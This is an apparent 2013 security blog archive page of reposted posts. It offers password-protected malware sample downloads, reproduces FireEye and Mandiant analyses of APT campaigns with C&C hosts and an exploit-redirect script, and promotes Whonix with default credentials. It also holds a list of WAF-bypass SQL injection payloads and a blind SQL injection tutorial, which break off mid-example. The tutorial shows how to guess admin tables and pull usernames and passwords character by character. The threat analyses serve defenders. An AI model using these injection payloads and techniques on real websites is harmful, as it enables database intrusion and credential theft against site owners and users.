Monthly Archives: May 2013

DeepEnd Research: Under this rock… Vulnerable WordPress/Joomla sites… Overview of the RFI botnet malware arsenal


Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan  (Mutopy  - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal 
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal 
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)

Read more at DeepEnd Research>>>

Download files (see below)



Download the nalware files (Email me if you need the password)
Download the pcap files (Email me if you need the password)


Wordpress_PHP_1FFD37807740EBCB7DAD044ACF866100_up.php 1ffd37807740ebcb7dad044acf866100
Wordpress_PHP_5F0BB0851B3A2838C34CF21400F22A7E_copy.php 5f0bb0851b3a2838c34cf21400f22a7e
Wordpress_PHP_7CCDCC3FF09262CAFE5DC953C0552254_seek.cgi 7ccdcc3ff09262cafe5dc953c0552254
Wordpress_PHP_9B6D87C50B58104E204481C580E630F1_sm14e.php 9b6d87c50b58104e204481c580e630f1
Wordpress_PHP_35DBB397351622B86E421EE8ABA095DE_fu.php 35dbb397351622b86e421ee8aba095de
Wordpress_PHP_45B02538063124A0FECC0987410B1A65_ru.php 45b02538063124a0fecc0987410b1a65
Wordpress_PHP_821BB092136A73EAA2CA803E6DBB658A_del.php 821bb092136a73eaa2ca803e6dbb658a

Wordpress-Mutopy_20A6EBF61243B760DD65F897236B6AD3.exe_ 20a6ebf61243b760dd65f897236b6ad3
Wordpress_DroppedbyMutopy_93F2D4ED74F7CCBF8E41F4D9D0B3BF98_Twain002.Mtx_ 93f2d4ed74f7ccbf8e41f4d9d0b3bf98
Wordpress_SDbot_AAEE52BFB589F6534C4B51E3B144DC08_svchost.exe_ aaee52bfb589f6534c4b51e3b144dc08
Worpress_Symmi_7958F73DAF4B84E3B00E008258EA2E7A_conhost.exe_ 7958f73daf4b84e3b00e008258ea2e7a

Whonix OS – A complete anonymous TOR OS


500

About whonix OS :

Whonix is a general purpose operating system working on virtual box, Debian GNU/Linux and Tor.Whonix is designed in a way that IP and DNS leaks are not possible, even a malware with administrative rights can not find out User's real IP adress and Location.




 (Image: GUI Desktop whonix OS)


 This works by running two virtual machines,one runs TOR and acts a gateway protector and other isolated whonix workstation for complete isolation.





Whonix is designed by team of TOR anonymity team,as it's under a beta version some bugs and virtuality issues may be found..


Screenshots of WHONIX OS:



(Image: TOR browser configured for anonymous browsing)



(Image:Flash leak test conducted for complete anonymity verification)





Some of the best features of whonix os are it can run flash ,java applets anonymously also it hide's the tracer from finding that you are using TOR.You can download this anonymous TOR powered whonix os from here..


 WHONIX OS <<DOWNLOAD LINK>>


If you are a first time user then the default username and passwords are,| USERNAME: user PASSWORD:changeme |


source :  http://hackersmeet.blogspot.in

APT1 Three Months Later – Significantly Impacted, Though Active & Rebuilding

On 18 February 2013, Mandiant released a report exposing one of China's cyber espionage units. The group, which Mandiant calls APT1, is one of the most prolific we track in terms of the sheer quantity of information it has stolen. The scale and impact of APT1′s operations compelled us to write the report and release more than 3,000 Indicators to help organizations defend against APT1's tactics. The report linked APT1 to a unit within China's People's Liberation Army and received widespread attention from the media and from the U.S. government.

Three months later, Mandiant has observed a decrease in APT1's operations. However, we can confirm that APT1 continues cyber espionage operations against targeted computer networks. While Mandiant's APT1 report seems to have affected APT1 operations, APT1 is still active using a well-coordinated and well-defined attack methodology against a wide set of industries -- with a discernible post-report shift towards new tools and infrastructure.

Mandiant's report and the simultaneous release of 3,000+ indicators hindered APT1's operations by causing the group to retool and change some operational methodology. Since the report, APT1 has stopped using the vast majority of the infrastructure that was disclosed with the release of the indicators. However, APT1 maintained an extensive infrastructure of computer systems around the world, and it is highly likely that APT1 still maintains access to those systems or has utilized those systems to establish new attack infrastructure in the last three months.

One thing that has not changed is the activity level of many of the 20+ Advanced Persistent Threat (APT) groups of suspected Chinese origin that Mandiant tracks. These groups are still very active and Mandiant has observed no significant changes in their operations after the release of the APT1 report. These groups also conduct cyber espionage campaigns against a broad range of victims and, based on Mandiant's observations, they were not directly affected by the release of the Mandiant APT1 report.

The discovery and attribution of APT1 to China's 2nd Bureau of the People's Liberation Army (PLA) General Staff Department's (GSD) 3rd Department (Military Unit Cover Designator 61398) also elevated the public dialogue about cyber espionage and the theft of intellectual property to a level not seen before. President Obama's National Security Advisor, Thomas Donilon, said that cyber espionage has moved to the "forefront" of the US agenda in its relationship with China and called for the Chinese Government to stop the hacking and to join an international process for limiting economic espionage.

Congress is taking action as well. Earlier this month, Senators Levin, McCain, Coburn and Rockefeller introduced S. 884, the Deter Cyber Theft Act, which would require the Government to publish an annual report listing foreign countries that engage in economic espionage and block imports from those countries made with stolen technologies. This bill is designed to be that next step not only to "name and shame" the bad actors but also to punish them economically.

The subject of Chinese attacks, such as those conducted by APT1, seems poised to stay front and center on the diplomatic agenda where, according to the New York Times, it will be a "central issue in an upcoming visit to China by President Obama's national security adviser, Thomas Donilon."

Ready for Summer: The Sunshop Campaign

FireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer zero-day, CVE-2013-1347, as well as recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign appears to have affected a number of victims based on the use of the Internet Explorer zero-day as well as the amount of traffic observed at making requests to the exploit server. This attack was likely executed by an actor we have named the 'Sunshop Group'. This actor was also responsible for the 2010 compromise of the Nobel Peace Prize website that leverage a zero-day in Mozilla Firefox.

Impacted Sites

The campaign in question compromised a number of strategic websites including:

• Multiple Korean military and strategy think tanks

• A Uyghur news and discussion forum

• A science and technology policy journal

• A website for evangelical students

A call to a malicious javascript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised websites.

The Exploit Server

If a visitor to one of these compromised website was running Internet Explorer 8.0 the malicious javascript would redirect them to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. Any other victims were redirected to a page that downloaded two malicious jars.

if(browser=="Microsoft Internet Explorer" && trim_Version=="MSIE8.0" && window.navigator.userLanguage.indexOf("en")>-1)

{

if(sys_Version=="WindowsNT5.1")

{

showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxximg.html");

}

else

showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html");//J

}

else

showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html");//J

Dropped Payloads and C&C Infrastructure

The Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at hk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and control server at dns[.]homesvr[.]tk.

The java exploits were packaged as two different jar files. One jar file had a MD5 of f4bee1e845137531f18c226d118e06d7 and exploited CVE-2013-2423. The second jar file had a MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited CVE-2013-1493.

The jar that exploited CVE-2013-2423 dropped a 9002 RAT with a MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT connected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped a 9002 RAT with a MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at ssl[.]homesvr[.]tk.

All of the above 9002 command and control domains resolved to 58.64.205.53. We previously discussed the extensive use of this RAT in other advanced persistent threat (APT) campaigns here.

Related Infrastructure

After further research into 58.64.205.53 with our friends at Mandiant we uncovered a Briba sample with the MD5 6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to this IP address. As seen in this malwr report, the command and control domain of nameserver1[.]zapto[.]org resolved to the same 58.64.205.53 IP address on 2013-05-07. This Briba sample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:

POST /index000001021.asp HTTP/1.1

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)

Host: update.microsoft.com

Connection: Keep-Alive

Content-Type: text/html

Content-Length: 000041

For a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.

The exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had a MD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5 2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at 9ijhh45[.]zapto[.]org over port 443 using a password of ‘ult4life’. This domain resolved to the same 58.64.205.53 IP between April 2nd and 8th.

Attribution

The Sunshop Group has utilized the same tactics described above in previous targeted attack campaigns. These similar tactics include the use of zero-day exploits, strategic web compromise as well as Briba malware.

One of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee’s website in 2010.This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.

Another publicly documented attack exploited a Flash zero-day and can be found here. Mila at the Contagio Blog posted additional information on this attack here. This attack dropped the same Briba payload discussed above.

FireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.

Malware

CVE Exploit hash Payload hash Malware family C&C Host C&C IP
CVE-2013-1347 CVE-2013-1347 fb24c49299b197e1b56a1a51430aea26 fb24c49299b197e1b56a1a51430aea26 b0ef2ab86f160aa416184c09df8388fe b0ef2ab86f160aa416184c09df8388fe 9002 9002 dns[.]homesvr[.]tk dns[.]homesvr[.]tk 58.64.205.53 58.64.205.53
CVE-2013-2423 CVE-2013-2423 f4bee1e845137531f18c226d118e06d7 f4bee1e845137531f18c226d118e06d7 d99ed31af1e0ad6fb5bf0f116063e91f d99ed31af1e0ad6fb5bf0f116063e91f 9002 9002 asp[.]homesvr[.]linkpc[.]net asp[.]homesvr[.]linkpc[.]net 58.64.205.53 58.64.205.53
CVE-2013-1493 CVE-2013-1493 3fbb7321d8610c6e2d990bb25ce34bec 3fbb7321d8610c6e2d990bb25ce34bec 42bd5e7e8f74c15873ff0f4a9ce974cd 42bd5e7e8f74c15873ff0f4a9ce974cd 9002 9002 ssl[.]homesvr[.]tk ssl[.]homesvr[.]tk 58.64.205.53 58.64.205.53
Unknown Unknown Unknown Unknown 6fe0f6e68cd9cc6ed7e100e7b3626665 6fe0f6e68cd9cc6ed7e100e7b3626665 Briba Briba nameserver1[.]zapto[.]org nameserver1[.]zapto[.]org 58.64.205.53 58.64.205.53
CVE-2013-1493 CVE-2013-1493 51aff823274e9d12b1a9a4bbbaf8ce00 51aff823274e9d12b1a9a4bbbaf8ce00 2B6605B89EAD179710565D1C2B614665 2B6605B89EAD179710565D1C2B614665 Poison Ivy Poison Ivy 9ijhh45[.]zapto[.]org 9ijhh45[.]zapto[.]org 58.64.205.53 58.64.205.53

WAF Bypass Sql Injection Tips

This is for who knows sql injection. Sometimes there will be a 403 forbidden error or not acceptable error its because of the WAF (web application firewall) you can bypass this by using the following queries. If u dont know sql injection you can learn it HERE
Order By Not Working?
You can simply bypass it by using group by instead of order by
Union Select Bypassing::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0)) 

/*!50000union*/+/*!50000select*/ 

UNIunionON+SELselectECT 

+union+distinct+select+ 

+union+distinctROW+select+ 

union+/*!select*/+1,2,3 

union/**/select/**/1,2,3 

uni%20union%20/*!select*/%20 

/**//*!union*//**//*!select*//**/ 

union%23aa%0Aselect 

/**/union/*!50000select*/ 

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ 

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ 

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ 

id=1+’UnI”On’+'SeL”ECT’ <-MySQL only 

id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
after id no. like id=1 +/*!and*/+1=0

+div+0 

Having+1=0 

+AND+1=0 

+/*!and*/+1=0 

and(1)=(0)
False The Url::

=-id=-1 union all select 

id=null union all select 

id=1+and+false+union+all+select 

id=9999 union all select
Order Bypassing do like this

/*!table_name*/ 

+from /*!information_schema*/./*!tables*/ where table_schema=database() 

unhex(hex(Concat(Column_Name,0x3e ,Table_schema,0x3e,table_Name))) 

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%2011 5,%2037)
used with order::

convert()using ascii) 

unhex(hex())
If ascii dont work you could try:


ujis 

ucs2 

tis620 

swe7 

sjis 

macroman 

macce 

latin7 

latin5 

latin2 

koi8u 

koi8r 

keybcs2 

hp8 

geostd8 

gbk 

gb2132 

armscii8 

ascii 

binary 

cp1250 

big5 

cp1251 

cp1256 

cp1257 

cp850 

cp852 

cp866 

cp932 

dec8 

euckr 

latin1 

utf8
source :  http://hack2play.blogspot.com 

Targeted Attack Trend Alert: PlugX the Old Dog With a New Trick

FireEye Labs has discovered a targeted attack towards Chinese political rights activists. The targets appear to be members of social groups that are involved in the political rights movement in China. The email turned up after the attention received in Beijing during the 12th National People's Congress and the 12th National Committee of the Chinese People's Political Consultative Conference, which is the election of a new core of leadership of the Chinese government, to determine the future of China's five-year development plan [1].

The email contains a weaponized attachment that utilizes the Windows Office CVE-2012-0158 exploit to drop the benign payload components and decoy document. The Remote Access Tool (RAT) PlugX itself is known as a combination of benign files that build the malicious execution. The Microsoft file OInfoP11.exe also known as “Office Data Provider for WBEM” is a certified file found in the National Software Reference Library (NIST) and is a component from Microsoft Office 2003 suite. For integrity checking endpoint protection, this file would be deemed as a valid clean file. In Windows 7+ distributions, the svchost.exe will require user interaction by displaying a UAC prompt only if UAC is enabled. Although in Windows XP distributions, this attack does not require user interaction. The major problem is that this file is subject to DLL Sideloading. In previous cases, PlugX has been utilizing similar DLL Sideloading prone files such as a McAfee binary called mcvsmap.exe [2], Intel’s hkcmd.exe [3], and NVIDIA’s NvSmart.exe [4]. In this case, OInfoP11.exe loads a DLL file named OInfo11.ocx (payload loader posing as an ActiveX DLL) that decompresses and decrypts the malicious payload OInfo11.ISO. This technique can be used to evade endpoint security solution that relies on binary signing. Traditional anti-virus (AV) solutions will have a hard time to identify the encrypted and compressed payload. At the time of writing of this blog, there is only 1 out of 46 AV vendors can detect the OInfo11.ocx file.

The diagram in figure 1 shows the behavior and relationship of these files.

5132013image001Figure 1: Attack Diagram

Infiltration

In Figure 2, the targeted email advertises a suffrage movement seminar event. Figure 3 is the contents of the Google document form link that contains the same information as in the email. In figure 4, the decoy document contains the details of the particular seminar section mentioned in the Google document link.

5132013image003

Figure 2: Original Email

Below is the English translation of the email in figure 2.

Li Ping

5132013image005Figure 3: Google Form

Decoy Document

5132013image007Figure 4: Decoy Document

Below is the translation to the document shown above.

The seminar

Attack Analysis

The XLS file (1146fdd6b579ac7144ff575d4d4fa28d) utilizes the CVE-2012-1058 Windows Office exploit to drop the “ews.exe” payload and the decoy document shown in figure 4. This payload extracts the Microsoft file OINFOP11.exe, the benign DLL OInfo11.ocx and encoded and compressed shellcode sections from Oinfo11.ISO. OInfoP11.exe will load OInfo11.ocx as a DLL and once loaded will decompress using RTLDecompressBuffer and decrypt the Oinfo11.ISO to run in memory. The malicious execution is never dropped to the file-system and is therefore not seen by filesystem-based anti-virus detectors. Figure 5 shows the high level view of the relationship of the dropped files.

5132013BLOG2

Figure 5: Payload Relationship

Summary of Dropped Files

Name Md5 Locations Type Encoded/Encrypted Compressed
Ews.exe Ews.exe 721cca40df0f7eab5b5cb069ee8fda9d 721cca40df0f7eab5b5cb069ee8fda9d %TEMP% %TEMP% Exe Exe
OINFOP11.EXE OINFOP11.EXE a31cad2960a660cb558b32ba7236b49e a31cad2960a660cb558b32ba7236b49e %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ Exe (clean) Exe (clean)
OInfo11.ocx OInfo11.ocx b355dedbabb145bbf8dd367adac4f8c5 b355dedbabb145bbf8dd367adac4f8c5 %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ Binary File Binary File Yes Yes
OInfo11.ISO OInfo11.ISO 128e3fc5ffba06abdd3edab2aff3753f 128e3fc5ffba06abdd3edab2aff3753f %TEMP%\RarSFX0\%ALLUSERSPROFILE%\\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\\SXS\ Binary File Binary File Yes Yes Yes Yes

Exploit Details

This malware uses CVE-2012-0158 to drop the payload from the section shown in Figure 6.

5132013_image012

Figure 6: Exploit Payload Section

Shellcode can be found in the first few bytes of this section. Figure 7 shows the disassembly of the code found at the 0x1de0b offset shown in figure 6.

5132013image014

Figure 7: Payload Shellcode

Campaign Characteristics

OInfoP11.exe is a valid Microsoft file and its certificate is shown in figure 8.

5132013_image016

Figure 8: Signature Usage

When the OInfop11.exe is called with the following arguments as C:\Documents and Settings\All Users\SxS\OINFOP11.EXE" 200 0, it will begin the loading of the file OInfo11.ocx.

5132013image019

Figure 10: Loader Entrypoint

The arrow shows the exact jump point where the entrypoint to where the shellcode begins for the decompression and decryption of the ISO file.

5132013_image021

Figure 11: Shellcode Example

This is an example of the memory space of the loaded benign DLL OInfo11.ocx. The functionality of OInfo11.ocx is essentially a loader in which this section decompresses and decrypts the malicious payload in memory.

5132013image023

Figure 12: Decryption of the ISO file

This is the decryption loop used through out the sample. In this instance, it is used to decrypt the ISO shellcode in memory.

5132013image025

Figure 13: DLL location in memory

This is an example of the complete malicious DLL address space in memory.

Entrenchment

Artifacts to watch for:

Mutex   \BaseNamedObjects\oleacc-msaa-loaded
DoInstPrepare
Registry Key Adds Adds Adds \REGISTRY\MACHINE\Software\CLASSES\FAST \REGISTRY\MACHINE\Software\CLASSES\FAST
Registry Key Registry Key Adds Adds \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Security\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Security\User Agent\Post Platform
Registry Key Registry Key Sets Value Sets Value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware
Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware
Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
Folders and Files Folders and Files Hides Hides %ALLUSERS PROFILE%\SXS\
%ALLUSERS PROFILE%\SXS\OInfo11.ocx
%ALLUSERS PROFILE%\SXS\OInfo11.ISO
%ALLUSERS PROFILE%\SXS\OINFOP11.EXE

5132013image027

Injection

The DLL injects code into svchost using the VirtualAllocEx call then uses WriteProcessMemory to write into the memory space of svchost.exe. The thread is then resumed to run the injected code. This injection process is used for both svchost.exe and msiexec.exe. When svchost.exe spawns msiexec.exe it calls the CreateEnvironmentBlock and the CreateProcessesUser so that the svchost service can launch a user session.

Keylogging Activity

Creates a kellogging file in %ALLUSERS PROFILE%\SXS\ as NvSmart.hlp. Below is an example of the content of this file.

2013

Proxy Establishment

This sample can communicate using ICMP, UDP, HTTP and TCP. In this situation the sample is using the string Protocol:[ TCP], Host: [202.69.69.41:90], Proxy: [0::0::] to establish the proxy for the C&C communication.

5132013image029

Figure 14: Communication Options

Modes of Operation Overview The table below outlines some of the functionality that this variant uses. The options have not changed so therefore this table is used as a refresher. Figure 15 shows an example of how these functions are called by the sample.

Mode Description
Disk Disk Access disk drives to modify the files Access disk drives to modify the files
Nethood Nethood List shares List shares
Netstat Netstat List TCP/UDP connections List TCP/UDP connections
Option Option Send system commands to the workstation such as screen lock Send system commands to the workstation such as screen lock
PortMap PortMap Port mapping Port mapping
Process Process Modify the state of processes Modify the state of processes
RegEdit RegEdit Modify registry keys Modify registry keys
Service Service Modify services Modify services
Shell Shell Communicate through the established name pipe to the C&C server Communicate through the established name pipe to the C&C server
SQL SQL SQL database queries SQL database queries
Telnet Telnet Startup telnet server on the victim Startup telnet server on the victim

5132013image031

Figure 15: Functionality Example

C&C Details and Communication

In figure 16, the sample is communicating to 202.69.69.41 over port 90. The C&C node is down in this case, but the communication is dynamic non-http communication. An example of the callback content is shown in figure 17. This sample will also try to communicate with other instances laterally in the same network. An example of this traffic and content can be seen in figure 18 and figure 19.

5132013image033

Figure 16: PCAP of C&C communication

5132013image035

Figure 17: Callback Traffic

5132013image037

Figure 18: UDP Beacon

5132013image30

Figure 19: UDP packet content

Whois Information on the IP 202.69.69.41

inetnum: 202.69.68.0 - 202.69.71.255

netname: NEWTT-AS-AP

descr: Wharf T&T

Limited descr: 11/F, Telecom Tower,

descr: Wharf T&T Square, 123 Hoi Bun Road

descr: Kwun Tong, Kowloon country: HK

admin-c: EN62-AP

tech-c: BW128-AP

mnt-by: APNIC-HM

mnt-lower: MAINT-HK-NEWTT

mnt-routes: MAINT-HK-NEWTT

mnt-irt: IRT-NEWTT-HK

status: ALLOCATED PORTABLE

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

remarks: This object can only be updated by APNIC hostmasters.

remarks: To update this object, please contact APNIC

remarks: hostmasters and include your organisation's account

remarks: name in the subject line.

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

changed: hm-changed@apnic.net 20120725

source: APNIC

person: Eric Ng

nic-hdl: EN62-AP

remarks: please report spam or abuse to abuse@wharftt.com

e-mail: abuse@wharftt.com

e-mail: ericng@wharftt.com

address: 11/F Telecom Tower, Wharf T&T Square

address: 123 Hoi Bun Road, Kwun Tong,'

phone: +852-2112-2653 fax-no: +852-2112-7883

country: HK changed: ericng@wharftt.com 20070716

mnt-by: MAINT-NEW source: APNIC

person: Benson Wong

nic-hdl: BW128-AP

e-mail: abuse@wharftt.com

address: 5/F, Harbour City, Kowloon,

address: Hong Kong

phone: +852-21122651

fax-no: +852-21127883

country: HK

changed: bensonwong@wharftt.com 20070420

mnt-by: MAINT-HK-NEWTT

source: APNIC

I want to thank the FireEye Labs Team.

[1] http://rmqlxk.blogspot.com/2013/03/blog-post_15.html

[2] http://www.circl.lu/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

[3] http://lastline.com/an-analysis-of-plugx.php

[4] http://blog.trendmicro.com/trendlabs-security-intelligence/unplugging-plugx-capabilities/

A Saudi Arabia Telecom’s Surveillance Pitch

Last week I was contacted by an agent of Mobily, one of two telecoms operating in Saudi Arabia, about a surveillance project that they’re working on in that country. Having published two reasonably popular MITM tools, it’s not uncommon for me to get emails requesting that I help people with their interception projects. I typically don’t respond, but this one (an email titled “Solution for monitoring encrypted data on telecom”) caught my eye.

BLIND and TIME-BASED SQL INJECTIONS

In today’s tutorial I will be doing my best to show you some examples of how to perform BLIND SQL Injections to extract information from a vulnerable backend database. This method is a little harder than the UNION method but is still very viable in the wild, if you are patient enough to stick with it to the end. I will follow similar form as previous tutorials and run through an example from start to finish with some helpful tips and additional examples at the end as well as a mini-tutorial on TIME-BASED Injections. I hope you find it informative and helpful, here goes…


I will begin as previously instructed using the UNION method to show that this method doesn’t always work (despite being the easiest). This will keep you from wasting your time as this is not the method to be starting with, due to time involved. OK so we test our site link to see if the page is vulnerable by adding the single quote to the end of our page link, and check the response for errors.

SAMPLE IMAGE - BEFORE ‘:


SAMPLE IMAGE - AFTER ‘:


We can see the page appears to be vulnerable. Let’s check for the column count as well as for the vulnerable column(s). We use ORDER BY as normal, but it doesn’t seem to have any affects despite how high I go (1-1500=no changes)….but wait I remember a note from previous tutorial about STRING based injections, let’s try that:

SAMPLE IMAGE - INTEGER APPROACH WITH NO LUCK:

SAMPLE IMAGE - STRING WITH DIFFERENT RESULTS:

What do you know…it worked! OK so we were able to find out that there are only 2 columns in our example site. Let’s now see if we can find out which one is vulnerable trying to use UNION SELECT. Hmm we seem to be getting an error...
Let’s try UNION ALL SELECT to see if this helps resolve the differences between column value types…

Still no luck…giving up? NO WAY, now let’s try to see if we can use some BLIND Injection techniques to get any results. We will begin by using AND/OR statement to confirm the site is vulnerable and then to work on extracting information and finally database contents. We can confirm the vulnerability of a page link similar to how we used the single quotation mark in previous examples, only for BLIND injections we will be using TRUE/FALSE statements to gain result, which at times may be based around the feedback received from the server as a result. The basic check works like this:
                http://www.site.com/index.php?id=725 AND 1=1                           (No Errors)
                http://www.site.com/index.php?id=725 AND 1=2                           (Errors on Page)
We are hoping to find a difference in how the two pages are displayed as a result of our trailing statement, just like we did with the single quotes on original tutorial. If we analyze them real quick we can see that 1 is always equal to 1 so it must be TRUE, whereas 1 does not equal 2 and thus should return FALSE. The differences when page refreshes may be highlighted by errors as in previous examples or it may be less subtle and may only be pictures failing to properly display, or pieces of the page missing text. The key is to simply look for differences, as these differences indicate we may have found an vulnerability. OK, moving forward…

We now have the column count, but we will need to check the version real quick to make sure we use the proper methods to extract information (remember the differences I highlighted in the original SQLi tutorial). We can check the version by running two request statements and comparing the results, whichever requests returns TRUE lets us know the version number. The two requests looks like this:
                http://www.site.com/index.php?id=725’  and substring(@@version,1,1)=4--+-
                http://www.site.com/index.php?id=725’  and substring(@@version,1,1)=5--+-

SAMPLE IMAGE - v4 Check:

SAMPLE IMAGE - V5 Check:

Alright, in this example we can see it is v5. OK, now we have the basics out of the way it is time to start enumerating some table names from the current database. We will use TRUE/FALSE request statements and then analyze the errors or response generated to determine if we are on the right track, as we will need to start by guessing the table names. This may take some guessing and sometime which is why most people don’t like this method, but it can pay off when nothing else will work so just have some patience. It will work like this:

http://www.site.com/index.php?id=725’  and (SELECT 1 from passwords limit 0,1)=1--+-                 (Errors)
http://www.site.com/index.php?id=725’  and (SELECT 1 from users limit 0,1)=1--+-                (Errors)
http://www.site.com/index.php?id=725’  and (SELECT 1 from members limit 0,1)=1--+-         (Errors)
http://www.site.com/index.php?id=725’  and (SELECT 1 from admin limit 0,1)=1--+-      (No Errors!)

If we get the page to refresh without any errors it is an indication that the table actually exists, whereas if the table does not exist the server will generate an error of some kind. We will use this info to map things out and simply keep replacing the table referenced after the FROM part of the statement until you are satisfied you have found all of the ones you’re interested in. In our example above we have found the table “admin” as the page refreshed 100% indicating the table name is present whereas errors were received on all of the others.

NOTE: In the errors sometimes it will say “Table 'X.<guessed-table-name>' doesn't exist”. This error indicates the current database name where “X” is (in case you couldn’t find it elsewhere).

TIP:  When guessing table names, start with the obvious ones and then work to more general ones. Also if you know you only care about specific ones then only work on those ones (admin, users, members, admincp, etc). Also be aware that not all admins are 100% dummies so they may have done something super tricky like rename them. I find a lot like to use site-name as prefix, or site-prefix-db and then the table or database names (i.e. Microsoft.com might use this type of naming convention m_admin, m_users, m_members, or maybe mdb_admin, mdb_users, etc). If you have time make sure you try all options as once you find one the rest typically follow the same naming convention.

SAMPLE IMAGE – ERROR:

SAMPLE IMAGE – TABLE PRESENT. NO ERROR:


We now have a valid table name, so it is time to change our syntax slightly so we can try to guess column names from the table that we already know is there. Again, we will be using the TRUE/FALSE results to determine what columns are present in the table. It will work like this:

http://www.site.com/index.php?id=725’   and (SELECT substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1--+-

We are now using SUBSTRING to query within query and check for columns FROM our found table (admin). Again, we will be guessing for the most part, but you can typically go for the main columns depending on what you are going for (i.e. id, userid, adminid, login, pass, password, email, access_level, etc). The process works the same as tables and you simply repeat until you think you got them all or at least the ones you need, to continue our example…

http://www/site.com/index.php?id=725’ and (SELECT substring(concat(1,userid),1,1) from admin limit 0,1)=1--+-                                                     (No Errors!!)
http://www/site.com/index.php?id=725’ and (SELECT substring(concat(1,login),1,1) from admin limit 0,1)=1--+-                                                          (Errors)
http://www/site.com/index.php?id=725’ and (SELECT substring(concat(1,username),1,1) from admin limit 0,1)=1--+-                                         (No Errors!!)
http://www/site.com/index.php?id=725’ and (SELECT substring(concat(1,password),1,1) from admin limit 0,1)=1--+-                                         (No Errors!!)

It looks like we have found the columns “userid”, “username” and “password” from our “admin” table.

SAMPLE IMAGE – Errors:


SAMPLE IMAGE – No Errors as Column is Present in Table:


Now that we have found the table name and associated column names we can actually extract some data. In order to extract we will change up our syntax slightly so that it takes advantage of the ASCII CHAR conversion. We will again analyze the results of based on TRUE/FALSE responses. This part is very time consuming as we have to get each letter at a time (in CHAR value) and then convert it over to get the standard plain text that most people can identify with. The process should go something like this:

·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65                           
o   TRUE – the first char of password for admin with userid1 is great than 65 so we need to go higher with our next request until we hit error
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>122                         
o   FALSE – Error, indicating it is not a char greater than 122 which is good as that is what we would expect, so now we need to meet in the middle
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>100
o   TRUE – still need to continue moving higher
·         http://www/site.com/index.php?id=725’ and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>115
o   FALSE – getting warmer, but still need to reduce a little
